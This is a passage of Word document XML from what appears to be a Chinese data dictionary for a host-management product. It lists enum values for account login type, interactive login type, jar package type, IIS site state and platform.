                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26852144" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C59FC14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="240D804D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FB5CEBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accountLoginType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CC90A4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="079CC3BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>不可登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D0C9317" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34FFD99F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>accountLoginType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="564C85D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50B6BA0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>key登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="01E72FEE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36739154" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accountLoginType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A9B114B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79F3328C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C7F7590" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D2675BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accountLoginType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="677F7095" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F0EF952" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>key&amp;pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60CDE6AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="529" w:name="_Toc115166337"/>
      <w:bookmarkStart w:id="530" w:name="linux交互登录方式"/>
      <w:bookmarkEnd w:id="528"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>交互登录方式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="529"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2199"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="370E2DD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617AB74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65195FD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="197EF874" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2DE4A4E0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="360177AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>interactiveLoginType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71594199" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0836804C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>不可登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52184D8E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3795E0DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>interactiveLoginType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BE08708" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FA90457" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>不可交互登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5DB3840F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09641329" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>interactiveLoginType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F3FC5D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C94A610" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可交互登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4ADE21E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="531" w:name="_Toc115166338"/>
      <w:bookmarkStart w:id="532" w:name="jar包类型"/>
      <w:bookmarkEnd w:id="530"/>
      <w:r>
        <w:t>jar包类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="531"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="632"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1658"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="73FD489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6C71DFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FD65DE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DDD75CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0DB2D443" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56D679C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D0ADF05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="251ABC34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="74666425" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2085B8C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="450D703F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F97FA34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统类库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F5CAAA4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="171CD5AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="483E3FF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1728B2B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>web服务</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>自带库</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5ED9FA59" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="710B03BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E9B18F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F18A0B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>其他依赖包</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B6603D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="533" w:name="_Toc115166339"/>
      <w:bookmarkStart w:id="534" w:name="iis站点状态"/>
      <w:bookmarkEnd w:id="532"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>站点状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="533"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="685"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="66CE4AE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3AD60D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D67D703" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43B08AEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4590B063" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="131BC76D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BBE55B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FEB6BBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>starting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B60317F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ACB9C6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="503D1954" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53017E89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>started</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32C0498C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3457CC46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27446C14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06F2FC28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>stopping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="563B4B28" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15D2507C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4066699B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33EE40DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>stopped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BBF1473" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="535" w:name="_Toc115166340"/>
      <w:bookmarkStart w:id="536" w:name="平台类型"/>
      <w:bookmarkEnd w:id="534"/>
      <w:r>
        <w:t>平台类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="535"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1071"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A9CCCD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C804E3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5145E7BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01D7B08D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6644795B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C6C2A9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CAB5180" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33628992" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71B0CB06" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BF097A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07F7150D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CEF4181" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
